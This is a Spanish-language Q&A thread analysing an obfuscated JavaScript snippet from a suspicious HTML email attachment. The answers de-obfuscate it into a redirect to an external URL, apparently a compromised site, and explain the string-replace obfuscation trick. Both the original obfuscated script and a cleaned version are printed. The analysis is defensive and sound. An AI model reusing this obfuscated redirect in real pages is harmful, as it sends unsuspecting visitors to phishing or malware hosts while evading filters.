¿Qué hace este código de phishing sospechoso?

Question

Algunos de mis compañeros de trabajo no informáticos abrieron un adjunto .html en un mensaje de correo electrónico que parece extremadamente sospechoso. Resultó en una pantalla en blanco cuando parece que se ejecutó algún código de JavaScript.

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script> 

¿Qué hizo? Está más allá del alcance de mi conocimiento de programación.

Answer 1

Redirigirá a una url, 'http://lendermedia.com/images/z.htm' (síguelo bajo su propio riesgo).

Copia y pega el código a un editor de JavaScript digno y haz que formatee la fuente por ti.

puntos clave:

var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, ''); 

h será igual 'http://lendermedia.com/images/z.htm'

t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')]; 

t contendrá una referencia a document.location

b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h; 

La propiedad denominada href de b, que en este punto (dentro de otra función) realmente es t de la declaración anterior, se establece en h, que es la url.

mayor parte del código es mero ruido, la funcionalidad real consiste en esto:

function uK() { 
}; 
uK.prototype = { 
    f : function() { 
    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^' 
     .replace(/[\^H\!9X]/g, ''); 
    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')]; 
    function x(b) { 
     b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h; 
    } 
    x(t); 
    } 
}; 
var tL = new uK(); 
tL.f(); 

Answer 2

Menos la ofuscación, que hace algo como document.location.href="http://lendermedia.com/images/z.htm"

Answer 3

parte clave para entender que el código es el replace(/[\^H\!9X]/g, '') partes. si el segundo argumento para el reemplazo es '', entonces simplemente está eliminando cosas de la cadena anterior.

Manera realmente poco elegante de ofuscar las cosas. Probablemente el objetivo sea ser aleatorio para cada usuario y evitar los filtros de spam bayesianos.

Answer 4

Me encontré con el mismo problema, y ​​luego encontré esta página. Después de hacer un WHOIS para la información de contacto, me puse en contacto con el propietario de lendermedia.com, quien parecía haber descubierto que su sitio aloja la página z.htm sin su conocimiento y en contra de sus deseos. En el momento en que lo contacté, pude buscar en su directorio /images/. Él desde entonces ha cambiado los permisos. Todo esto para decir que parece que este tipo está limpio, pero eso es para que usted decida.